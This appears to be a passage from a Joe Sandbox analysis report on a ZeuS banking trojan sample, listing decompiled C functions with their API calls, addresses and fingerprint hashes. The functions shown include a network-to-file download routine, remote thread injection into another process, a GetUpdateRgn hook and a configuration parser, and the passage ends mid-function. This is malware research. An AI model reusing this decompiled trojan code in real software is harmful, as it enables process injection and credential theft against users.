				_t41 = CreateFileW(_a8, 0x40000000, 1, 0, 2, 0x80, 0);
				if(_t41 == 0xffffffff) {
					L15:
					return _v5;
				}
				_t28 = E004051B6(0x1000);
				_v20 = _t28;
				if(_t28 == 0) {
					L13:
					CloseHandle(_t41);
					if(_v5 == 0) {
						E0040A548(_a8);
					}
					goto L15;
				}
				_v16 = 0;
				while(_a16 == 0 || WaitForSingleObject(_a16, 0) == 0x102) {
					if(InternetReadFile(_a4, _v20, 0x1000,  &_v12) == 0) {
						break;
					}
					if(_v12 == 0) {
						FlushFileBuffers(_t41);
						_v5 = 1;
						break;
					}
					if(WriteFile(_t41, _v20, _v12,  &_v24, 0) == 0) {
						break;
					}
					_t37 = _v12;
					if(_t37 != _v24) {
						break;
					}
					_v16 = _v16 + _t37;
					if(_v16 <= _a12) {
						continue;
					}
					break;
				}
				E004051E6(_v20);
				goto L13;
			}

0x00407045
0x0040704e
0x00407053
0x004070f3
0x004070f9
0x004070f9
0x0040705e
0x00407063
0x00407068
0x004070df
0x004070e0
0x004070e9
0x004070ee
0x004070ee
0x00000000
0x004070e9
0x0040706a
0x0040706d
0x0040709a
0x00000000
0x00000000
0x0040709f
0x004070cd
0x004070d3
0x00000000
0x004070d3
0x004070b5
0x00000000
0x00000000
0x004070b7
0x004070bd
0x00000000
0x00000000
0x004070bf
0x004070c8
0x00000000
0x00000000
0x00000000
0x004070ca
0x004070da
0x00000000

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,00000000,?,?,?,?,00000000), ref: 00407048
WaitForSingleObject.KERNEL32(?,00000000), ref: 00407076
InternetReadFile.WININET(00001000,?,00001000,?), ref: 00407092
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 004070AD
FlushFileBuffers.KERNEL32(00000000), ref: 004070CD
CloseHandle.KERNEL32(00000000), ref: 004070E0

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: File$BuffersCloseCreateFlushHandleInternetObjectReadSingleWaitWrite
String ID:
API String ID: 3509176705-0
Opcode ID: b599e8e0629d27dd6a9138bd500c00c4b82d30f9c3d647bf3e9d8a9aacd13cef
Instruction ID: 21b0d861f39a0add10b6e9b01f5aebf11b8a2428febc8b3b58e12b2323c8b79d
Opcode Fuzzy Hash: b599e8e0629d27dd6a9138bd500c00c4b82d30f9c3d647bf3e9d8a9aacd13cef
Instruction Fuzzy Hash: 72219D30D08209BFDF119FA0DC84BAF7B79AB04314F10817AF611B52E0C7399D409B2A

Uniqueness

Uniqueness Score: -1.00%

Function 00409922, Relevance: 9.1, APIs: 6, Instructions: 72
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00409922(int __ecx, intOrPtr* __edx, struct tagPOINT _a4, signed int _a8) {
				intOrPtr* _v8;
				long _v12;
				struct HWND__* _v16;
				int _v20;
				struct HWND__* _v24;
				long _t24;
				struct HWND__* _t33;
				intOrPtr* _t44;

				_push(_a8);
				_t44 = __edx;
				_v8 = __edx;
				_v20 = __ecx;
				_t33 = WindowFromPoint(_a4.x);
				if(_t33 != 0) {
					if(SendMessageTimeoutW(_t33, 0x84, 0, (_a8 & 0x0000ffff) << 0x00000010 | _a4.x & 0x0000ffff, 2, _v20,  &_v12) != 0) {
						_t24 = _v12;
						if(_t24 != 0xffffffff) {
							if(_t44 != 0) {
								 *_t44 = _t24;
							}
						} else {
							_v16 = _t33;
							SetWindowLongW(_t33, 0xfffffff0, GetWindowLongW(_t33, 0xfffffff0) | 0x08000000);
							_t33 = E00409922(_v20, _v8, _a4, _a8);
							SetWindowLongW(_v24, 0xfffffff0, GetWindowLongW(_v24, 0xfffffff0) & 0xf7ffffff);
						}
					} else {
						_t33 = 0;
					}
				}
				return _t33;
			}

0x0040992e
0x00409931
0x00409936
0x0040993a
0x00409944
0x00409948
0x00409977
0x0040997d
0x00409984
0x004099d5
0x004099d7
0x004099d7
0x00409986
0x0040998f
0x004099a4
0x004099bf
0x004099cf
0x004099cf
0x00409979
0x00409979
0x00409979
0x00409977
0x004099e1

APIs

WindowFromPoint.USER32(?,?), ref: 0040993E
SendMessageTimeoutW.USER32 ref: 0040996F
GetWindowLongW.USER32(00000000,000000F0), ref: 00409993
SetWindowLongW.USER32 ref: 004099A4
GetWindowLongW.USER32(?,000000F0), ref: 004099C1
SetWindowLongW.USER32 ref: 004099CF

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: Window$Long$FromMessagePointSendTimeout
String ID:
API String ID: 2645164282-0
Opcode ID: dce1cf5a15b1546a4c5bdbbdc19d40005f9222d868c2999854deafd93e8116fc
Instruction ID: fbb239f87f6728597af5ead3176ec19b808993276fa075f5a650eeadcb783ca4
Opcode Fuzzy Hash: dce1cf5a15b1546a4c5bdbbdc19d40005f9222d868c2999854deafd93e8116fc
Instruction Fuzzy Hash: 3021A4B1509216ABD7109F658C80E6B7B98EB84330F20472AB9B1A23E2D674DD049B95

Uniqueness

Uniqueness Score: -1.00%

Function 0040A402, Relevance: 9.1, APIs: 6, Instructions: 68
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E0040A402(signed int __eax, void* __ecx, void** __esi, long _a4) {
				intOrPtr _v8;
				long _v12;
				void* _t19;
				void* _t20;
				long _t22;
				void* _t23;

				_t33 = __esi;
				asm("sbb eax, eax");
				_t19 = CreateFileW(_a4, 0x80000000,  ~(__eax & 2) & 0x00000006 | 0x00000001, 0, 3, 0, 0);
				__esi[2] = _t19;
				if(_t19 == 0xffffffff) {
					L11:
					_t20 = 0;
				} else {
					__imp__GetFileSizeEx(_t19,  &_v12);
					if(_t19 == 0 || _v8 != 0) {
						L10:
						CloseHandle(_t33[2]);
						goto L11;
					} else {
						_t22 = _v12;
						__esi[1] = _t22;
						if(_t22 != 0) {
							_t23 = VirtualAlloc(0, _t22, 0x3000, 4);
							 *__esi = _t23;
							if(_t23 == 0) {
								goto L10;
							} else {
								if(ReadFile(__esi[2], _t23, __esi[1],  &_a4, 0) == 0 || _a4 != __esi[1]) {
									VirtualFree( *_t33, 0, 0x8000);
									goto L10;
								} else {
									goto L5;
								}
							}
						} else {
							 *__esi = 0;
							L5:
							_t20 = 1;
						}
					}
				}
				return _t20;
			}

0x0040a402
0x0040a415
0x0040a427
0x0040a42d
0x0040a433
0x0040a4a3
0x0040a4a3
0x0040a435
0x0040a43a
0x0040a442
0x0040a49a
0x0040a49d
0x00000000
0x0040a449
0x0040a449
0x0040a44c
0x0040a451
0x0040a462
0x0040a468
0x0040a46c
0x00000000
0x0040a46e
0x0040a482
0x0040a494
0x00000000
0x00000000
0x00000000
0x00000000
0x0040a482
0x0040a453
0x0040a453
0x0040a455
0x0040a455
0x0040a455
0x0040a451
0x0040a442
0x0040a4a7

APIs

CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000,?,?,?,?,0041D18D,?,?,00000000), ref: 0040A427
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0041D18D,?,?,00000000), ref: 0040A43A
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,0041D18D,?,?,00000000), ref: 0040A462
ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0041D18D,?,?,00000000), ref: 0040A47A
VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,0041D18D,?,?,00000000), ref: 0040A494
CloseHandle.KERNEL32(?,?,?,?,?,0041D18D,?,?,00000000), ref: 0040A49D

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: File$Virtual$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 1974014688-0
Opcode ID: 4052ee2f780a7bd919cbd2b078e2e408700851ea0fcb83b52b19f83f5baaf78f
Instruction ID: 193709cf1db975cb980c074224cdb74986ae2a2de4d3f91ada3513172f2f9dd5
Opcode Fuzzy Hash: 4052ee2f780a7bd919cbd2b078e2e408700851ea0fcb83b52b19f83f5baaf78f
Instruction Fuzzy Hash: 7C11B279100300BFDB218F61CC4DE6B7BB8EB55750B10893EF596E61A0E7B4A951CB29

Uniqueness

Uniqueness Score: -1.00%

Function 00417860, Relevance: 9.1, APIs: 6, Instructions: 54
windowCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00417860(struct HWND__* _a4, struct HRGN__* _a8, int _a12) {
				void* _t21;
				int _t22;
				signed int _t23;
				struct HWND__* _t27;
				char* _t31;

				_t27 = _a4;
				if(( *0x4239b0 & 0x00000004) == 0 || E0041CAA4() == 0) {
					L7:
					return GetUpdateRgn(_t27, _a8, _a12);
				} else {
					_t31 = TlsGetValue( *0x42323c);
					if(_t31 == 0 || _t27 !=  *((intOrPtr*)(_t31 + 4))) {
						goto L7;
					} else {
						SetRectRgn(_a8,  *(_t31 + 0xc),  *(_t31 + 0x10),  *(_t31 + 0x14),  *(_t31 + 0x18));
						if(_a12 != 0) {
							_t22 = SaveDC( *(_t31 + 8));
							_t23 = SendMessageW(_t27, 0x14,  *(_t31 + 8), 0);
							asm("sbb eax, eax");
							 *((intOrPtr*)(_t31 + 0x1c)) =  ~_t23 + 1;
							RestoreDC( *(_t31 + 8), _t22);
						}
						 *_t31 = 1;
						_t21 = 2;
						return _t21;
					}
				}
			}

0x0041786b
0x0041786f
0x004178e1
0x00000000
0x0041787a
0x00417886
0x0041788a
0x00000000
0x00417891
0x004178a0
0x004178aa
0x004178b0
0x004178c0
0x004178c8
0x004178cf
0x004178d2
0x004178d8
0x004178db
0x004178de
0x00000000
0x004178de
0x0041788a

APIs

GetUpdateRgn.USER32 ref: 004178E8

Part of subcall function 0041CAA4: WaitForSingleObject.KERNEL32(00000000,0041BE2C,?,19367402,00000001), ref: 0041CAAC

TlsGetValue.KERNEL32 ref: 00417880
SetRectRgn.GDI32(?,?,?,?,?), ref: 004178A0
SaveDC.GDI32(?), ref: 004178B0
SendMessageW.USER32(?,00000014,?,00000000), ref: 004178C0
RestoreDC.GDI32(?,00000000), ref: 004178D2

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: MessageObjectRectRestoreSaveSendSingleUpdateValueWait
String ID:
API String ID: 3142230470-0
Opcode ID: 015894a628da38b99424145dd5176a317cd0f21fb19e9e48b3953106d61aa2d9
Instruction ID: 8a0d6ee86921e324627b39020cb799e34fa996f6a4f56197cb50163597b89cf5
Opcode Fuzzy Hash: 015894a628da38b99424145dd5176a317cd0f21fb19e9e48b3953106d61aa2d9
Instruction Fuzzy Hash: 91119A31104344EFCB326F61ED48F96BBB5FF08310F00492AFA8691571C7359490EB58

Uniqueness

Uniqueness Score: -1.00%

Function 00404F6E, Relevance: 9.1, APIs: 6, Instructions: 54
synchronizationthreadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00404F6E(void* __ecx, long _a4, intOrPtr _a8) {
				char _v5;
				void* __edi;
				void* __esi;
				void* _t10;
				void* _t14;
				void* _t23;
				void* _t25;
				void* _t26;

				_t21 = __ecx;
				_push(__ecx);
				_v5 = 0;
				_t23 = OpenProcess(0x47a, 0, _a4);
				_t28 = _t23;
				if(_t23 != 0) {
					_push(_t25);
					_t10 = E0041C9B9(_t21, _t23, _t25, _t28, _a8, 0);
					_t26 = _t10;
					if(_t26 != 0) {
						_t14 = CreateRemoteThread(_t23, 0, 0, _t10 -  *0x4239c4 + E0041D160, 0, 0, 0);
						_a4 = _t14;
						if(_t14 == 0) {
							VirtualFreeEx(_t23, _t26, 0, 0x8000);
						} else {
							WaitForSingleObject(_t14, 0x2710);
							CloseHandle(_a4);
							_v5 = 1;
						}
					}
					CloseHandle(_t23);
				}
				return _v5;
			}

0x00404f6e
0x00404f71
0x00404f7f
0x00404f88
0x00404f8a
0x00404f8c
0x00404f8e
0x00404f93
0x00404f98
0x00404f9c
0x00404fb0
0x00404fb6
0x00404fbb
0x00404fe0
0x00404fbd
0x00404fc3
0x00404fcc
0x00404fd2
0x00404fd2
0x00404fbb
0x00404fe7
0x00404fed
0x00404ff4

APIs

OpenProcess.KERNEL32(0000047A,00000000,74B5F560,00000000,74B5F560,?,?,00405126,?,?,00000000,?,74B5F560,00000000), ref: 00404F82
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,-00840B24,00000000,00000000,00000000), ref: 00404FB0
WaitForSingleObject.KERNEL32(00000000,00002710,?,00405126,?,?,00000000,?,74B5F560,00000000), ref: 00404FC3
CloseHandle.KERNEL32(74B5F560,?,00405126,?,?,00000000,?,74B5F560,00000000), ref: 00404FCC
VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000,?,00405126,?,?,00000000,?,74B5F560,00000000), ref: 00404FE0
CloseHandle.KERNEL32(00000000,?,00000000,?,?,00405126,?,?,00000000,?,74B5F560,00000000), ref: 00404FE7

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: CloseHandle$CreateFreeObjectOpenProcessRemoteSingleThreadVirtualWait
String ID:
API String ID: 14861764-0
Opcode ID: 832df6abfea4818286aa590ce4bc2ddcec98d1f934cb695f356d6e545c872562
Instruction ID: 475ea5b1eac5786bedd7b618cd2d995553b83b3e234b8fa5846e74d6fec6ef34
Opcode Fuzzy Hash: 832df6abfea4818286aa590ce4bc2ddcec98d1f934cb695f356d6e545c872562
Instruction Fuzzy Hash: 66019EB6508149BFEB112B759CCCEBF3E6CEB89395B044079F601F21A0C6794D459678

Uniqueness

Uniqueness Score: -1.00%

Function 00411752, Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 303
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E00411752(void* __edx, intOrPtr _a4) {
				signed int _v12;
				int _v16;
				void* _v20;
				int _v24;
				signed int _v28;
				int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v74;
				intOrPtr _v78;
				char _v80;
				struct _SYSTEMTIME _v96;
				char _v112;
				short _v184;
				short _v288;
				void* __ebx;
				void* __esi;
				signed int _t127;
				signed int _t131;
				signed int _t132;
				signed int _t133;
				signed int _t134;
				signed int _t140;
				signed int _t142;
				signed int _t143;
				signed int _t151;
				signed int _t155;
				signed int _t159;
				signed char _t163;
				signed int _t167;
				signed int _t176;
				signed int _t177;
				signed int _t186;
				long _t191;
				long _t195;
				signed int _t201;
				void* _t202;
				signed int _t203;
				signed int _t208;
				signed int _t211;
				signed int _t212;
				signed int _t219;
				short* _t230;
				signed int _t238;
				intOrPtr _t239;
				void* _t244;

				_t239 = _a4;
				_t126 =  *((intOrPtr*)(_t239 + 0x40));
				if( *((intOrPtr*)(_t239 + 0x40)) != 0) {
					_t127 = E0040AD5E( &_v12, __edx, __eflags, _t126, 0x4e27, 0x10000000);
					 *(_t239 + 0x3c) =  *(_t239 + 0x3c) & 0x00000000;
					 *(_t239 + 0x38) =  *(_t239 + 0x38) & 0x00000000;
					_t238 = _t127;
					_v64 = _t238;
					__eflags = _t238;
					if(_t238 == 0) {
						L55:
						E004051E6(_v64);
						__eflags = 0 -  *(_t239 + 0x3c);
						asm("sbb eax, eax");
						return  ~0x00000000;
					}
					_t131 = _v12;
					__eflags = _t131 - 0x10;
					if(_t131 <= 0x10) {
						goto L55;
					}
					__eflags =  *((char*)(_t239 + 0x18)) - 1;
					_v16 = 1;
					_t132 = _t131 + _t238;
					__eflags = _t132;
					_v28 = ((0 |  *((char*)(_t239 + 0x18)) != 0x00000001) - 0x00000001 & 0xffffffe0) + 0x00000040 & 0x0000ffff;
					_v12 = _t132;
					while(1) {
						_t133 =  *(_t238 + 2) & 0x0000ffff;
						__eflags = _t133 - 0x10;
						if(_t133 < 0x10) {
							goto L55;
						}
						_t219 =  *(_t238 + 4) & 0x0000ffff;
						__eflags = _t219 - _t133;
						if(_t219 >= _t133) {
							goto L55;
						}
						__eflags =  *(_t238 + 6) - _t133;
						if( *(_t238 + 6) >= _t133) {
							goto L55;
						}
						__eflags =  *(_t238 + 8) - _t133;
						if( *(_t238 + 8) >= _t133) {
							goto L55;
						}
						__eflags =  *(_t238 + 0xa) - _t133;
						if( *(_t238 + 0xa) >= _t133) {
							goto L55;
						}
						__eflags =  *(_t238 + 0xc) - _t133;
						if( *(_t238 + 0xc) >= _t133) {
							goto L55;
						}
						__eflags =  *(_t238 + 0xe) - _t133;
						if( *(_t238 + 0xe) >= _t133) {
							goto L55;
						}
						_t134 =  *_t238 & 0x0000ffff;
						_t208 = _t134 >> 0x00000009 & 0x00000008;
						_t220 = _t238 + _t219;
						__eflags = (_t134 & _v28) - _v28;
						if((_t134 & _v28) != _v28) {
							L48:
							_t238 = _t238 + ( *(_t238 + 2) & 0x0000ffff);
							_t102 = _t238 + 0x10; // 0x10
							__eflags = _t102 - _v12;
							if(_t102 > _v12) {
								goto L55;
							}
							__eflags = ( *(_t238 + 2) & 0x0000ffff) + _t238 - _v12;
							if(( *(_t238 + 2) & 0x0000ffff) + _t238 > _v12) {
								goto L55;
							}
							_v16 = _v16 + 1;
							continue;
						}
						_t234 = _t208;
						_t140 = E0041142F(_t220, _t208,  *((intOrPtr*)(_t239 + 8)),  *((intOrPtr*)(_t239 + 0xc)));
						__eflags = _t140;
						if(_t140 == 0) {
							goto L48;
						}
						_t141 =  *(_t239 + 0x44);
						__eflags =  *(_t239 + 0x44);
						if(__eflags == 0) {
							L16:
							_t142 =  *(_t238 + 8) & 0x0000ffff;
							__eflags = _t142;
							if(_t142 == 0) {
								L18:
								_t143 =  *(_t238 + 0xa) & 0x0000ffff;
								__eflags = _t143;
								if(_t143 == 0) {
									L20:
									__eflags =  *_t238 & 0x00000010;
									if(( *_t238 & 0x00000010) == 0) {
										L31:
										E00405299( &_v60,  &_v60, 0, 0x1c);
										_v60 =  *_t238 & 0x0000ffff;
										_t209 = _t208 | 0xffffffff;
										_v56 = E00405644(_t208 | 0xffffffff, ( *(_t238 + 4) & 0x0000ffff) + _t238);
										_t151 =  *(_t238 + 6) & 0x0000ffff;
										__eflags = _t151;
										if(_t151 != 0) {
											__eflags = _t151 + _t238;
											_v52 = E00405644(_t209, _t151 + _t238);
										} else {
											_v52 = _v52 & 0x00000000;
										}
										_t155 =  *(_t238 + 0xc) & 0x0000ffff;
										__eflags = _t155;
										if(_t155 != 0) {
											__eflags = _t155 + _t238;
											_v48 = E00405644(_t209, _t155 + _t238);
										} else {
											_v48 = _v48 & 0x00000000;
										}
										_t159 =  *(_t238 + 0xe) & 0x0000ffff;
										__eflags = _t159;
										if(_t159 != 0) {
											__eflags = _t159 + _t238;
											_v44 = E00405644(_t209, _t159 + _t238);
										} else {
											_v44 = _v44 & 0x00000000;
										}
										_t163 =  *_t238 & 0x0000ffff;
										__eflags = _t163 & 0x00000003;
										if((_t163 & 0x00000003) != 0) {
											E00412692( *(_t239 + 0x3c),  *(_t239 + 0x38));
											 *(_t239 + 0x3c) =  *(_t239 + 0x3c) & 0x00000000;
											_t167 = E00405239(__eflags,  &_v60, 0x1c);
											 *(_t239 + 0x38) = _t167;
											__eflags = _t167;
											if(_t167 == 0) {
												E00412669( &_v60);
												_t239 = _a4;
											} else {
												 *(_t239 + 0x3c) =  *(_t239 + 0x3c) + 1;
											}
											goto L55;
										} else {
											__eflags = _t163 & 0x0000000c;
											if(__eflags == 0) {
												E00412669( &_v60);
												L47:
												_t239 = _a4;
												goto L48;
											}
											_t211 = E0040AD5E( &_v36, _t234, __eflags,  *((intOrPtr*)(_t239 + 0x40)), _v16, 0x40000000);
											_v40 = _t211;
											__eflags = _t211;
											if(_t211 == 0) {
												L54:
												E004051E6(_t211);
												E00412669( &_v60);
												_t239 = _a4;
												E00412692( *(_t239 + 0x3c),  *((intOrPtr*)(_a4 + 0x38)));
												_t122 = _t239 + 0x3c;
												 *_t122 =  *(_t239 + 0x3c) & 0x00000000;
												__eflags =  *_t122;
												goto L55;
											}
											_t176 = E0040B430(_t211, _v36);
											__eflags = _t176;
											if(_t176 == 0) {
												goto L54;
											}
											_t177 = E00405171(( *(_t239 + 0x3c) + 1) * 0x1c, _t239 + 0x38);
											__eflags = _t177;
											if(_t177 == 0) {
												goto L54;
											}
											 *(_a4 + 0x3c) =  *(_a4 + 0x3c) + 1;
											E00405222( *(_a4 + 0x3c) * 0x1c +  *((intOrPtr*)(_t178 + 0x38)),  &_v60, 0x1c);
											goto L47;
										}
									}
									__eflags =  *(_t238 + 0xc);
									if( *(_t238 + 0xc) <= 0) {
										goto L31;
									}
									E0041CD2B( &_v184, _t220, 1,  &_v288);
									_t186 = E0040648B( &_v112, ( *(_t238 + 0xc) & 0x0000ffff) + _t238, E00405D23(( *(_t238 + 0xc) & 0x0000ffff) + _t238));
									__eflags = _t186;
									if(_t186 == 0) {
										goto L48;
									}
									_t230 =  &_v184;
									_t212 = 0;
									__eflags = 0;
									do {
										E0040554E( *((intOrPtr*)(_t244 + _t212 - 0x6c)), _t230);
										_t212 = _t212 + 1;
										_t230 = _t230 + 4;
										__eflags = _t212 - 0x10;
									} while (_t212 < 0x10);
									_v32 = _v32 | 0xffffffff;
									_t208 = 0x10;
									 *_t230 = 0;
									_v24 = _t208;
									_v20 = 0x80000001;
									_t191 = RegOpenKeyExW(0x80000001,  &_v288, 0, 1,  &_v20);
									__eflags = _t191;
									if(_t191 != 0) {
										goto L31;
									}
									_t195 = RegQueryValueExW(_v20,  &_v184, 0, 0,  &_v80,  &_v24);
									__eflags = _t195;
									if(_t195 == 0) {
										_v32 = _v24;
									}
									RegCloseKey(_v20);
									__eflags = _v32 - _t208;
									if(_v32 == _t208) {
										GetLocalTime( &_v96);
										__eflags = _v74 - _v96.wDay;
										if(_v74 != _v96.wDay) {
											goto L31;
										}
										__eflags = _v78 - _v96.wMonth;
										if(_v78 == _v96.wMonth) {
											goto L48;
										}
									}
									goto L31;
								}
								_t220 = _t238 + _t143;
								_t201 = E00411464(_t238 + _t143,  *((intOrPtr*)(_t239 + 0x24)),  *((intOrPtr*)(_t239 + 0x28)));
								__eflags = _t201;
								if(_t201 == 0) {
									goto L48;
								}
								goto L20;
							}
							_t220 = _t238 + _t142;
							_t202 = E00411464(_t238 + _t142,  *((intOrPtr*)(_t239 + 0x24)),  *((intOrPtr*)(_t239 + 0x28)));
							__eflags = _t202 - 1;
							if(_t202 == 1) {
								goto L48;
							}
							goto L18;
						}
						_t203 = E004116EA(_t220, _t234, __eflags, 4, _t141,  *((intOrPtr*)(_t239 + 8)),  *((intOrPtr*)(_t239 + 0xc)), _t208);
						__eflags = _t203;
						if(_t203 != 0) {
							goto L48;
						}
						goto L16;
					}
					goto L55;
				}
				return 0;
			}

0x0041175d
0x00411760
0x00411766
0x0041177d
0x00411782
0x00411786
0x0041178a
0x0041178c
0x0041178f
0x00411791
0x00411af4
0x00411af7
0x00411afe
0x00411b01
0x00000000
0x00411b03
0x00411797
0x0041179a
0x0041179d
0x00000000
0x00000000
0x004117a5
0x004117a9
0x004117bd
0x004117bd
0x004117bf
0x004117c2
0x004117c5
0x004117c5
0x004117c9
0x004117cc
0x00000000
0x00000000
0x004117d2
0x004117d6
0x004117d9
0x00000000
0x00000000
0x004117df
0x004117e3
0x00000000
0x00000000
0x004117e9
0x004117ed
0x00000000
0x00000000
0x004117f3
0x004117f7
0x00000000
0x00000000
0x004117fd
0x00411801
0x00000000
0x00000000
0x00411807
0x0041180b
0x00000000
0x00000000
0x00411811
0x0041181c
0x0041181f
0x00411822
0x00411826
0x00411a7e
0x00411a82
0x00411a84
0x00411a87
0x00411a8a
0x00000000
0x00000000
0x00411a92
0x00411a95
0x00000000
0x00000000
0x00411a97
0x00000000
0x00411a97
0x0041182f
0x00411834
0x00411839
0x0041183b
0x00000000
0x00000000
0x00411841
0x00411844
0x00411846
0x0041185f
0x0041185f
0x00411863
0x00411866
0x0041187e
0x0041187e
0x00411882
0x00411885
0x0041189d
0x0041189d
0x004118a0
0x00411984
0x0041198c
0x00411994
0x0041199e
0x004119a8
0x004119ab
0x004119af
0x004119b2
0x004119ba
0x004119c4
0x004119b4
0x004119b4
0x004119b4
0x004119c7
0x004119cb
0x004119ce
0x004119d6
0x004119e0
0x004119d0
0x004119d0
0x004119d0
0x004119e3
0x004119e7
0x004119ea
0x004119f2
0x004119fc
0x004119ec
0x004119ec
0x004119ec
0x004119ff
0x00411a02
0x00411a04
0x00411aa5
0x00411aaa
0x00411ab4
0x00411ab9
0x00411abc
0x00411abe
0x00411ac8
0x00411acd
0x00411ac0
0x00411ac0
0x00411ac0
0x00000000
0x00411a0a
0x00411a0a
0x00411a0c
0x00411a76
0x00411a7b
0x00411a7b
0x00000000
0x00411a7b
0x00411a21
0x00411a23
0x00411a26
0x00411a28
0x00411ad2
0x00411ad3
0x00411adb
0x00411ae6
0x00411aeb
0x00411af0
0x00411af0
0x00411af0
0x00000000
0x00411af0
0x00411a33
0x00411a38
0x00411a3a
0x00000000
0x00000000
0x00411a4a
0x00411a4f
0x00411a51
0x00000000
0x00000000
0x00411a62
0x00411a6c
0x00000000
0x00411a6c
0x00411a04
0x004118a6
0x004118ab
0x00000000
0x00000000
0x004118c0
0x004118d6
0x004118db
0x004118dd
0x00000000
0x00000000
0x004118e3
0x004118e9
0x004118e9
0x004118eb
0x004118ef
0x004118f4
0x004118f5
0x004118f8
0x004118f8
0x004118fd
0x00411903
0x00411906
0x0041191e
0x00411921
0x00411924
0x0041192a
0x0041192c
0x00000000
0x00000000
0x00411944
0x0041194a
0x0041194c
0x00411951
0x00411951
0x00411957
0x0041195d
0x00411960
0x00411966
0x00411970
0x00411974
0x00000000
0x00000000
0x0041197a
0x0041197e
0x00000000
0x00000000
0x0041197e
0x00000000
0x00411960
0x0041188a
0x00411890
0x00411895
0x00411897
0x00000000
0x00000000
0x00000000
0x00411897
0x0041186b
0x00411871
0x00411876
0x00411878
0x00000000
0x00000000
0x00000000
0x00411878
0x00411852
0x00411857
0x00411859
0x00000000
0x00000000
0x00000000
0x00411859
0x00000000
0x004117c5
0x00000000

Strings

Q!A, xrefs: 00411A13

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID:
String ID: Q!A
API String ID: 0-528218480
Opcode ID: e221c2becc118f0350062a7159fecb7109ef5b40dbcfb767155ed548372cc5f7
Instruction ID: 713d8404cf675d592991f2974253f77bd6a94d27dbd093bef97545ad52147c96
Opcode Fuzzy Hash: e221c2becc118f0350062a7159fecb7109ef5b40dbcfb767155ed548372cc5f7
Instruction Fuzzy Hash: 36B1B171900609AADF10EF95C881BFEBBB5FF04344F40452BFA51A66A1E778A9C1CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0041C086, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0041C086(void* _a4, WCHAR* _a8) {
				char _v40;
				char _v160;
				char _v680;
				void* __edi;
				void* __esi;
				void** _t11;
				void* _t13;
				void* _t16;
				void* _t18;
				void* _t23;
				void* _t28;
				void* _t30;
				WCHAR* _t34;

				_t11 =  &_a4;
				_t28 = 0;
				__imp__ConvertSidToStringSidW(_a4, _t11);
				if(_t11 != 0) {
					_t37 =  &_v160;
					_t13 = 4;
					E0040F34A(_t13,  &_v160);
					_push(_a4);
					_t34 =  &_v680;
					_t16 = E00405ED9(_t37, 0x104, _t34, _t37);
					_pop(_t30);
					if(_t16 > 0) {
						_t18 = 5;
						E0040F34A(_t18,  &_v40);
